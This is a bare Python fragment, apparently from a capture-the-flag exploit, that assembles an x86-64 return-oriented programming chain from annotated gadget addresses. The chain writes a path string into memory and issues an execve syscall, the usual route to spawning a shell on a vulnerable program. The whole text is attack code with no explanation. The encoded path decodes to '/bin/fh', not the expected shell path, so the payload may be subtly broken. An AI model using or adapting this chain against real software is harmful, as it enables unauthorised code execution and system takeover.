payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x471070)+p64(0x407f0b)
# 0x0000000000407f0b: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x43aff4)
# 0x43aff4: stosd dword ptr [rdi], eax ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x471074)+p64(0x407f0b)
# 0x0000000000407f0b: pop rax; ret; 
payload += p64(0x68662f)+p64(0x43aff4)
# 0x43aff4: stosd dword ptr [rdi], eax ; retf
payload += p32(0x407f0b)+p32(0x33)
# 0x0000000000407f0b: pop rax; ret; 
payload += p64(0x0)+p64(0x43e0d6)
# 0x43e0d6: cdq ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x471070)+p64(0x407f0b)
# 0x0000000000407f0b: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4549ea)
# 0x00000000004549ea: syscall; 
payload += b''
